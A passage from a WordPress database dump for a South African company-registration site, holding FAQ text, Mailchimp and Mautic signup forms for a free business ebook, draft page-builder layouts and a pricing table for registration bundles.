(PAYE)]','','publish','open','open','','employees-tax-pay-as-you-earn-paye','','','2018-05-11 16:53:48','2018-05-11 14:53:48','',0,'https://companyregistration.online/?p=369',0,'post','',0),(397,2,'2018-05-11 16:49:08','0000-00-00 00:00:00','[et_pb_section bb_built=\"1\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text _builder_version=\"3.2.1\"]\r\n<h2>Restoration of Companies and CC\'s FAQs</h2>\r\nWho qualifies as the applicant in terms of the re-instatement application form? The applicant may either be,\r\nThe Directors/members of the company or close corporation,\r\nA third person who has an interest in the re-instatement of the company or close corporation,\r\nThe duly authorised representative of the directors/member/third person.\r\nThe person, whose customer code is used to file and affect payment, may not necessarily be the director / member / third person/representative.\r\n\r\n\"How would I know whether the re-instatement application has been processed? A confirmation letter and certificate will be forwarded to the details of the person whose customer code was used.\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','<h2>Restoration of Companies and CC\'s FAQs</h2>','','draft','open','open','','','','','2018-05-11 16:49:08','2018-05-11 14:49:08','',0,'https://companyregistration.online/?p=397',0,'post','',0),(404,1,'2016-04-24 16:46:17','2016-04-24 14:46:17','','Tax-Clearance-Certificate','','inherit','open','closed','','tax-clearance-certificate-2','','','2016-04-24 16:46:17','2016-04-24 14:46:17','',76,'https://companyregistration.online/wp-content/uploads/2016/03/Tax-Clearance-Certificate.gif',0,'attachment','image/gif',0),(408,1,'2016-06-19 16:28:41','2016-06-19 14:28:41','<p>\r\n    <label>Email Address</label>\r\n    <input type=\"email\" name=\"EMAIL\" required>\r\n</p>\r\n<p>\r\n    <label>First Name</label>\r\n    <input type=\"text\" name=\"FNAME\" required>\r\n</p>\r\n<p>\r\n    <input type=\"submit\" value=\"Gimme My Download\">\r\n</p>\r\n','Free Report Download Form','','publish','closed','closed','','free-report-download-form','','','2016-06-19 16:28:41','2016-06-19 14:28:41','',0,'https://companyregistration.online/mc4wp-form/free-report-download-form/',0,'mc4wp-form','',0),(409,1,'2016-06-19 15:44:41','0000-00-00 00:00:00','<p>\r\n    <label>Email Address</label>\r\n    <input type=\"email\" name=\"EMAIL\" required>\r\n</p>\r\n<p>\r\n    <label>First Name</label>\r\n    <input type=\"text\" name=\"FNAME\" required>\r\n</p>\r\n<p>\r\n    <input type=\"submit\" value=\"Gimme My Download\">\r\n</p>\r\n','Free Report Download Form','','draft','closed','closed','','','','','2016-06-19 15:44:41','2016-06-19 13:44:41','',0,'https://companyregistration.online/?post_type=mc4wp-form&#038;p=409',0,'mc4wp-form','',0),(437,1,'2016-05-28 20:00:34','0000-00-00 00:00:00','<h3 style=\"text-align: center;\"><strong>Thinking of starting or registering a business</strong></h3>\r\n<h3 style=\"text-align: center;\"><strong>Get a free copy of</strong></h3>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #800080;\">“ What I need to know before I start my business ”</span></h2>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Save yourself countless hours — and the possible headache of making huge foundational mistakes — by reading through this free report.</strong></span></h3>\r\n<!-- Begin MailChimp Signup Form -->\r\n<div id=\"mc_embed_signup\"><form id=\"mc-embedded-subscribe-form\" class=\"validate\" action=\"//registermybusiness.us10.list-manage.com/subscribe/post?u=7fae3c322f084db6319336637&amp;id=2361d27fb8\" method=\"post\" name=\"mc-embedded-subscribe-form\" novalidate=\"\" target=\"_blank\">\r\n<div id=\"mc_embed_signup_scroll\">\r\n<h2 style=\"text-align: center;\">Fill in the form below to get your Free Report</h2>\r\n<a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Free-Report-cover.png\"><img class=\"wp-image-195 alignleft\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Free-Report-cover-300x300.png\" alt=\"Free Report\" width=\"228\" height=\"228\" /></a>\r\n\r\n<center><input id=\"mce-EMAIL\" class=\"required email\" name=\"EMAIL\" size=\"30\" type=\"email\" value=\"Enter your email\" />\r\n<input id=\"mce-FNAME\" class=\"name\" name=\"FNAME\" size=\"30\" type=\"text\" value=\"Enter your name\" /></center>\r\n<div id=\"mce-responses\" class=\"clear\"></div>\r\n<div class=\"clear\"><center><input id=\"mc-embedded-Gimme my download\" class=\"button\" name=\"Gimme my download\" type=\"submit\" value=\"Gimme my download\" /></center><center></center><center><strong>Information about:</strong></center></div>\r\n</div>\r\n</form></div>\r\n<!--End mc_embed_signup-->\r\n<ul>\r\n 	<li>Phases of a business</li>\r\n 	<li>The structure of a business</li>\r\n 	<li>Tax implications of running a business and the various tax deadlines</li>\r\n 	<li>Whats in a name and how to get the right name for your business.</li>\r\n</ul>','Working with Mailchimp','','draft','closed','closed','','','','','2016-05-28 20:00:34','2016-05-28 18:00:34','',0,'https://companyregistration.online/?page_id=437',0,'page','',0),(459,1,'2016-05-30 21:04:28','2016-05-30 19:04:28','<h2 style=\"text-align: center;\"><span style=\"color: #800080;\">“ What I need to know before I start my business ”</span></h2>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><span style=\"font-size: 18pt;\"><strong>Save</strong></span><strong> yourself <span style=\"font-size: 18pt;\">countless hours</span> and the possible <span style=\"font-size: 18pt;\">headache</span> of making huge <span style=\"font-size: 24pt;\"><span style=\"font-size: 18pt;\">foundational mistakes</span></span> by reading through this report.</strong></span></p>\r\n\r\n<div id=\"mc_embed_signup\"><form id=\"mc-embedded-subscribe-form\" class=\"validate\" action=\"//onlne.us10.list-manage.com/subscribe/post?u=7fae3c322f084db6319336637&amp;id=08de047b4d\" method=\"post\" name=\"mc-embedded-subscribe-form\" novalidate=\"\" target=\"_blank\">\r\n<div id=\"mc_embed_signup_scroll\">\r\n<h2><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Free-Report-cover.png\"><img class=\"size-medium wp-image-195 alignleft\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Free-Report-cover-300x300.png\" alt=\"Free Report\" width=\"300\" height=\"300\" /></a>Complete the form below to receive your free report</h2>\r\n<div class=\"indicates-required\"><span class=\"asterisk\">*</span> indicates required</div>\r\n<div class=\"mc-field-group\"><label for=\"mce-EMAIL\">Email Address <span class=\"asterisk\">*</span>\r\n</label>\r\n<input id=\"mce-EMAIL\" class=\"required email\" name=\"EMAIL\" type=\"email\" value=\"\" /></div>\r\n<div class=\"mc-field-group\"><label for=\"mce-FNAME\">First Name <span class=\"asterisk\">*</span>\r\n</label>\r\n<input id=\"mce-FNAME\" class=\"required\" name=\"FNAME\" type=\"text\" value=\"\" /></div>\r\n<div id=\"mce-responses\" class=\"clear\"></div>\r\n<!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->\r\n<div style=\"position: absolute; left: -5000px;\"><input tabindex=\"-1\" name=\"b_7fae3c322f084db6319336637_08de047b4d\" type=\"text\" value=\"\" /></div>\r\n<div class=\"clear\"><input id=\"mc-embedded-subscribe\" class=\"button\" name=\"subscribe\" type=\"submit\" value=\"Gimme My Download\" /></div>\r\n</div>\r\n</form></div>\r\n<script src=\"//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js\" type=\"text/javascript\"></script><script type=\"text/javascript\">// <![CDATA[\r\n(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]=\'EMAIL\';ftypes[0]=\'email\';fnames[1]=\'FNAME\';ftypes[1]=\'text\';}(jQuery));var $mcj = jQuery.noConflict(true);\r\n// ]]></script>\r\n<!--End mc_embed_signup-->','Free Report Sale Funnel form','','publish','closed','closed','','free-report-sale-funnel-form','','','2016-06-07 14:48:59','2016-06-07 12:48:59','',0,'https://companyregistration.online/?page_id=459',0,'page','',0),(491,1,'2016-06-07 15:25:32','2016-06-07 13:25:32','<h2 style=\"text-align: center;\"><span style=\"color: #800080;\">Complete the form below to get your free report\r\n</span></h2>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><span style=\"font-size: 18pt;\"><strong>Save</strong></span><span style=\"font-size: 14pt;\"> yourself</span><strong> <span style=\"font-size: 18pt;\">countless hours</span> </strong><span style=\"font-size: 14pt;\">and the possible</span> <strong><span style=\"font-size: 18pt;\">headache</span> </strong><span style=\"font-size: 14pt;\">of making huge</span><strong> <span style=\"font-size: 24pt;\"><span style=\"font-size: 18pt;\">foundational mistakes</span></span></strong> <span style=\"font-size: 14pt;\">by reading through this report.</span></span></p>\r\n<script type=\"text/javascript\">// <![CDATA[ /** This section is only needed once per page if manually copying **/ if (typeof MauticSDKLoaded == \'undefined\') { var MauticSDKLoaded = true; var head = document.getElementsByTagName(\'head\')[0]; var script = document.createElement(\'script\'); script.type = \'text/javascript\'; script.src = \'https://companyregistration.mautic.net/mautic/media/js/mautic-form.js\'; script.onload = function() { MauticSDK.onLoad(); }; head.appendChild(script); var MauticDomain = \'https://companyregistration.mautic.net\'; var MauticLang = { \'submittingMessage\': \"Please wait...\" } } // ]]></script>\r\n<div id=\"mauticform_wrapper_salesfunnelfreereportform\" class=\"mauticform_wrapper\"><form id=\"mauticform_salesfunnelfreereportform\" action=\"https://companyregistration.mautic.net/form/submit?formId=1\" autocomplete=\"false\" method=\"post\" data-mautic-form=\"salesfunnelfreereportform\">\r\n<div id=\"mauticform_salesfunnelfreereportform_message\" class=\"mauticform-message\"></div>\r\n<div class=\"mauticform-innerform\">\r\n<div id=\"mauticform_salesfunnelfreereportform_first_name\" class=\"mauticform-row mauticform-text mauticform-required\" data-validate=\"first_name\" data-validation-type=\"text\"><label id=\"mauticform_label_salesfunnelfreereportform_first_name\" class=\"mauticform-label\" for=\"mauticform_input_salesfunnelfreereportform_first_name\">First Name</label><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Free-Report-cover.png\"><img class=\" wp-image-195 alignleft\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Free-Report-cover-300x300.png\" alt=\"Free Report\" width=\"245\" height=\"245\" /></a>\r\n<input id=\"mauticform_input_salesfunnelfreereportform_first_name\" class=\"mauticform-input\" name=\"mauticform[first_name]\" type=\"text\" value=\"\" />\r\n<span class=\"mauticform-errormsg\" style=\"display: none;\">This is required.</span></div>\r\n<div id=\"mauticform_salesfunnelfreereportform_email\" class=\"mauticform-row mauticform-email mauticform-required\" data-validate=\"email\" data-validation-type=\"email\"><label id=\"mauticform_label_salesfunnelfreereportform_email\" class=\"mauticform-label\" for=\"mauticform_input_salesfunnelfreereportform_email\">Email</label>\r\n<input id=\"mauticform_input_salesfunnelfreereportform_email\" class=\"mauticform-input\" name=\"mauticform[email]\" type=\"email\" value=\"\" />\r\n<span class=\"mauticform-errormsg\" style=\"display: none;\">This is required.</span></div>\r\n<div id=\"mauticform_salesfunnelfreereportform_giime_my_download\" class=\"mauticform-row mauticform-button-wrapper\"><button id=\"mauticform_input_salesfunnelfreereportform_giime_my_download\" class=\"mauticform-button\" name=\"mauticform[giime_my_download]\" type=\"submit\" value=\"\">Gimme My Download</button></div>\r\n<input id=\"mauticform_salesfunnelfreereportform_id\" name=\"mauticform[formId]\" type=\"hidden\" value=\"1\" />\r\n<input id=\"mauticform_salesfunnelfreereportform_return\" name=\"mauticform[return]\" type=\"hidden\" value=\"\" />\r\n<input id=\"mauticform_salesfunnelfreereportform_name\" name=\"mauticform[formName]\" type=\"hidden\" value=\"salesfunnelfreereportform\" />\r\n\r\n</div>\r\n</form></div>','Free report','','publish','closed','closed','','mautic-2','','','2016-08-22 20:34:58','2016-08-22 18:34:58','',0,'https://companyregistration.online/?page_id=491',0,'page','',0),(496,1,'2016-06-07 16:37:42','2016-06-07 14:37:42','<h3 style=\"text-align: center;\"><span style=\"color: #800080;\"><strong>Please take time to read through this ebook, we are sure that you find it useful especially if this is your first business venture.</strong></span></h3>\r\n<h2 style=\"text-align: center;\">To download your free report:</h2>\r\n<span style=\"font-size: 14pt;\">Simply <strong>RIGHT CLICK</strong> on the image below.</span>\r\n\r\n<span style=\"font-size: 14pt;\">Then, depending on your browser choose: <strong>‘Save Target As…’ </strong>, <strong>‘Save Link As…’</strong> or <strong>‘Download Linked File As…’. </strong>You can then save your free report on your computer.</span>\r\n<p style=\"text-align: center;\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/06/What-I-need-to-know-before-I-start-my-business.pdf\"><img class=\"aligncenter wp-image-650 size-medium\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-212x300.jpg\" alt=\"Ebook: &quot;What I need to know before I start my business&quot;\" width=\"212\" height=\"300\" /></a></p>','Free eBook Download','','publish','closed','closed','companyregistration','free-ebook-download','','','2016-08-22 20:48:45','2016-08-22 18:48:45','',0,'https://companyregistration.online/?page_id=496',0,'page','',0),(557,1,'2016-08-01 06:21:01','0000-00-00 00:00:00','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/03/Front-page-Welcome-rmb-1-White-business-sorted.png\" transparent_background=\"on\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"on\" parallax_method=\"on\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"row\"][et_pb_column type=\"1_2\"][et_pb_cta admin_label=\"Call To Action\" title=\"Get your Free Report\" url_new_window=\"off\" button_text=\"Gimme my download\" use_background_color=\"on\" background_color=\"#0c71c3\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"on\" border_color=\"#e5e5e5\" border_style=\"groove\" custom_button=\"off\" button_letter_spacing=\"0\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" body_font_size=\"10\"] [/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fullwidth=\"off\" specialty=\"off\" admin_label=\"Section\"][et_pb_row admin_label=\"Row\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_signup admin_label=\"Email Optin\" provider=\"feedburner\" mailchimp_list=\"none\" aweber_list=\"none\" use_background_color=\"on\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"left\" use_focus_border_color=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"off\" button_letter_spacing=\"0\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\"] [/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"off\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"on\" parallax_method_1=\"on\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_shop admin_label=\"Shop\" type=\"recent\" posts_number=\"3\" columns_number=\"3\" orderby=\"menu_order\"] [/et_pb_shop][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\"][et_pb_row_inner admin_label=\"Row\" padding_mobile=\"off\" use_custom_gutter=\"off\" column_padding_mobile=\"on\" make_equal=\"on\"][et_pb_column_inner type=\"4_4\" saved_specialty_column_type=\"1_2\"][et_pb_blurb admin_label=\"Blurb\" title=\"Contact us\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%132%%\" icon_color=\"#0c71c3\" use_circle=\"on\" circle_color=\"#0c71c3\" use_circle_border=\"on\" circle_border_color=\"#6899c1\" icon_placement=\"top\" animation=\"top\" background_layout=\"dark\" text_orientation=\"left\" use_icon_font_size=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\njhjkhkjhkjhkjhk\n\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner admin_label=\"Row\"][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_counters admin_label=\"Bar Counters\" background_layout=\"dark\" background_color=\"#dddddd\" bar_bg_color=\"#7EBEC5\" use_percentages=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"] [et_pb_counter percent=\"95\"] Customer service rating [/et_pb_counter][et_pb_counter percent=\"90\"] Companies registered within stipulated time [/et_pb_counter] [/et_pb_counters][et_pb_circle_counter admin_label=\"Circle Counter\" title=\"Companies registered this month\" number=\"100\" percent_sign=\"off\" background_layout=\"light\" bar_bg_color=\"#7cda24\"] [/et_pb_circle_counter][et_pb_accordion admin_label=\"Accordion\" open_toggle_background_color=\"#c4c4c4\" icon_color=\"#000000\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"] [et_pb_accordion_item title=\"FAQ\"]\n\nhgkjhgkjhgkjhgkjhgkjhgkjhgkjhgkjhgkjhgkjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj\n\njhkjhkjhlkjhl\n\nkjlkjllllllllllllllllllllllllll\n\n[/et_pb_accordion_item] [/et_pb_accordion][et_pb_tabs admin_label=\"Tabs\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"] [et_pb_tab title=\"Tabs\" tab_font_select=\"default\" tab_font=\"||||\" tab_line_height=\"2em\" tab_line_height_tablet=\"2em\" tab_line_height_phone=\"2em\" body_font_select=\"default\" body_font=\"||||\" body_line_height=\"2em\" body_line_height_tablet=\"2em\" body_line_height_phone=\"2em\"]\n\njhgkjgkjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj\n\nkjlkjlkjlk\n\njkjhkjhkjkj\n\n[/et_pb_tab] [/et_pb_tabs][/et_pb_column][/et_pb_section]','Divi WIP','','draft','closed','closed','','','','','2016-08-01 06:21:01','2016-08-01 04:21:01','',0,'https://companyregistration.online/?page_id=557',0,'page','',0),(566,1,'2016-06-21 00:19:34','0000-00-00 00:00:00','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#bed8a6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"on\" parallax_method=\"on\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"row\"][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"off\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][et_pb_blurb admin_label=\"Blurb\" title=\"Finance\" url_new_window=\"off\" use_icon=\"on\" font_icon=\"%%269%%\" icon_color=\"#0c71c3\" use_circle=\"on\" circle_color=\"#7EBEC5\" use_circle_border=\"on\" circle_border_color=\"#7EBEC5\" icon_placement=\"left\" animation=\"top\" background_layout=\"dark\" text_orientation=\"left\" use_icon_font_size=\"off\" background_color=\"#a4d872\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n<h5>Financial Year 2016</h5>\r\nIssues\r\n\r\n1.    Cannot record motor vehicle insurance will be disallowed by SARS, the business does not own any MV\r\n\r\n2.    Petrol expenses should relate mainly to travelling between practices\r\n\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"1_3\"][/et_pb_column][et_pb_column type=\"1_3\"][/et_pb_column][et_pb_column type=\"1_3\"][/et_pb_column][/et_pb_row][/et_pb_section]','Divi Test post','','draft','open','open','','','','','2016-06-21 00:19:34','2016-06-20 22:19:34','',0,'https://companyregistration.online/?p=566',0,'post','',0),(571,1,'2016-07-07 23:12:37','2016-07-07 21:12:37','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\" custom_padding=\"30px|0px|5px|0px\"][et_pb_row custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.2.2\" tab_font=\"|on|||\" tab_text_color=\"#0c71c3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\"][et_pb_tab title=\"Great Value\" _builder_version=\"3.2.2\" inline_fonts=\"Abel\"]<h4><span style=\"font-family: Abel; font-weight: normal;\"><strong>Registration for taxes will have to be done at some point in the future, why not do it now and save. Income tax registration occurs automatically when the company is registered.</strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.2.2\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>\n[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents <span style=\"color: #993366;\">for your tender</span> fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>\r[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\" custom_padding=\"20px|0px|2px|0px\"][et_pb_row custom_padding=\"26px|0px|27px|0px\" _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_pricing_tables featured_table_background_color=\"rgba(20,20,20,0.09)\" featured_table_header_background_color=\"#68d800\" header_background_color=\"#0c71c3\" featured_table_text_color=\"#000000\" _builder_version=\"3.2.2\" body_font=\"Abel|on|||\" subheader_font=\"||||||||\" currency_frequency_font=\"||||||||\" currency_frequency_line_height=\"1.8em\" price_font=\"||||||||\" price_font_size=\"50px\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.88)\" background_color_gradient_end=\"rgba(0,0,0,0.08)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"43%\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"1px\" button_icon=\"%%144%%\" button_icon_color=\"#0c71c3\" button_text_color_hover=\"#0c71c3\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#0c71c3\" button_border_radius_hover=\"15px\"][et_pb_pricing_table title=\"Basic\" subtitle=\"Normal R1 399\" currency=\"R\" sum=\"999\" button_url=\"https://companyregistration.online/shop/bundled-products/basic-bundle/\" button_text=\"Buy Now\" _builder_version=\"3.2.2\" header_font=\"|600|||||||\" body_font=\"||||||||\" subheader_font=\"|600|||||||\" currency_frequency_font=\"|600|||||||\" currency_frequency_font_size=\"16px\" price_font=\"|600|||||||\" border_radii=\"|10px|||10px\" border_width_left=\"0px\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_tablet=\"1\" button_letter_spacing_phone=\"1\" button_icon_default=\"%%144%%\"]+ Income Tax registration\r\n\r\n+ Name reservation\r\n\r\n+ Company registration\r\n\r\n+ Tax Clearance\r\n\r\n+ BEE Affidavit\r\n\r\n- Share Certificate\r\n\r\n- Share register\r\n\r\n- Vat registration\r\n\r\n- PAYE registration\r[/et_pb_pricing_table][et_pb_pricing_table title=\"Gold\" subtitle=\"Normally R2 199\" currency=\"R\" sum=\"1899\" button_url=\"https://companyregistration.online/shop/bundled-products/gold-bundle/\" button_text=\"Buy Now\" _builder_version=\"3.2.2\" header_font=\"|600|||||||\" body_font=\"||||\" subheader_font=\"|600|||||||\" currency_frequency_font=\"||||\" price_font=\"|600|||||||\" border_radii=\"|0px|0px|10px|0px\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_tablet=\"1\" button_letter_spacing_phone=\"1\" button_icon_default=\"%%144%%\"]+ Income Tax registration\r\n\r\n+ Name reservation\r\n\r\n+ Company registration\r\n\r\n+ Tax Clearance\r\n\r\n+ BEE Affidavit\r\n\r\n+ Share Certificate\r\n\r\n+ Share register\r\n\r\n- Vat registration\r\n\r\n- PAYE registration\r[/et_pb_pricing_table][et_pb_pricing_table featured=\"on\" title=\"Tender Ready\" subtitle=\"Normally R6 798\" currency=\"R\" sum=\"4 999\" button_url=\"https://companyregistration.online/shop/bundled-products/tender-ready/\" button_text=\"Buy Now\" _builder_version=\"3.2.2\" header_font=\"|600|||||||\" header_text_color=\"#000000\" body_font=\"||||\" subheader_font=\"||||||||\" subheader_text_color=\"#000000\" currency_frequency_font=\"|600|||||||\" currency_frequency_text_color=\"#000000\" currency_frequency_font_size=\"23px\" price_font=\"|600|||||||\" price_text_color=\"#000000\" price_font_size=\"46px\" background_color=\"rgba(0,153,12,0.51)\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#68d800\" background_color_gradient_end=\"#ffffff\" background_color_gradient_direction=\"135deg\" background_color_gradient_start_position=\"13%\" background_color_gradient_end_position=\"10%\" border_radii=\"on|10px|10px|10px|10px\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_tablet=\"1\" button_letter_spacing_phone=\"1\" box_shadow_style=\"preset1\" button_icon_default=\"%%144%%\"]+ Income Tax registration\r\n\r\n+ Name reservation\r\n\r\n+ Company registration\r\n\r\n+ Tax Clearance\r\n\r\n+ BEE Affidavit\r\n\r\n+ Share Certificate\r\n\r\n+ Share register\r\n\r\n+ Vat registration\r\n\r\n-<span style=\"color: rgba(0, 0, 0, 0.25);\"> PAYE registration</span>\r[/et_pb_pricing_table][et_pb_pricing_table title=\"Business Pro\" subtitle=\"Normally R8 298\" currency=\"R\" sum=\"5999\" button_url=\"https://companyregistration.online/shop/bundled-products/business-pro/\" button_text=\"Buy Now\" _builder_version=\"3.2.2\" header_font=\"|600|||||||\" body_font=\"||||\" subheader_font=\"|600|||||||\" currency_frequency_font=\"||||\" price_font=\"|600|||||||\" border_radii=\"|0px|10px|10px|10px\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_tablet=\"1\" button_letter_spacing_phone=\"1\" button_icon_default=\"%%144%%\"]+ Income Tax registration\r\n\r\n+ Name reservation\r\n\r\n+ Company registration\r\n\r\n+ Tax Clearance\r\n\r\n+ BEE Affidavit\r\n\r\n+ Share Certificate\r\n\r\n+ Share register\r\n\r\n+ Vat registration\r\n\r\n+ PAYE registration\r[/et_pb_pricing_table][/et_pb_pricing_tables][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" disabled_on=\"on|on|on\" admin_label=\"Hidden\" _builder_version=\"3.2.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(104,216,0,0.71)\" background_color_gradient_end=\"rgba(255,255,255,0.4)\" background_color_gradient_direction=\"90deg\" background_color_gradient_start_position=\"6%\" background_color_gradient_end_position=\"5%\" box_shadow_style=\"preset2\" custom_padding=\"0px|0px|0px|0px\" filter_invert=\"3%\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.1)\" bottom_divider_height=\"133px\" bottom_divider_flip=\"horizontal\" bottom_divider_arrangement=\"above_content\" animation_style=\"slide\" animation_direction=\"right\" animation_duration=\"1300ms\" animation_delay=\"100ms\"][et_pb_row _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.2.2\" header_font=\"||||||||\" header_font_size=\"21px\" header_2_font=\"||||||||\" header_2_font_size=\"34px\" inline_fonts=\"Aldrich\"]<h1 style=\"text-align: center;\"><span style=\"font-size: xx-large;\"><strong><span style=\"font-family: Aldrich; color: #333333;\"><span style=\"color: #800080;\">OR</span></span></strong></span></h1>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal; color: #333333;\"><strong>Customize a solution for your business and if the total value of your purchase is more than R1500, get a <span style=\"color: #c61b88;\">20% discount</span> on checkout</strong></span><span style=\"font-size: large; font-family: Abel; font-weight: normal; color: #333333;\"><strong>.</strong></span></h2>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"font-size: xx-large;\"><em><span style=\"font-family: Abel; font-weight: normal; color: #000000;\"><strong>Use the coupon code <span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\">customisemore <strong><span style=\"color: #000000;\">when checking out</span></strong><br /> </span></strong></span></em></span></h2>[/et_pb_text][et_pb_button button_url=\"https://companyregistration.online/product-category/\" url_new_window=\"on\" button_text=\"Customize Now\" button_alignment=\"center\" _builder_version=\"3.0.87\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Combo Services Pricing','','publish','closed','closed','','combo-services','','','2018-05-15 12:48:03','2018-05-15 10:48:03','',0,'https://companyregistration.online/?page_id=571',0,'page','',0),(649,1,'2016-07-02 07:06:27','2016-07-02 05:06:27','','Private-Company-registration-cover','','inherit','open','closed','','private-company-registration-cover','','','2016-07-02 07:06:27','2016-07-02 05:06:27','',28,'https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg',0,'attachment','image/jpeg',0),(650,1,'2016-07-02 13:26:06','2016-07-02 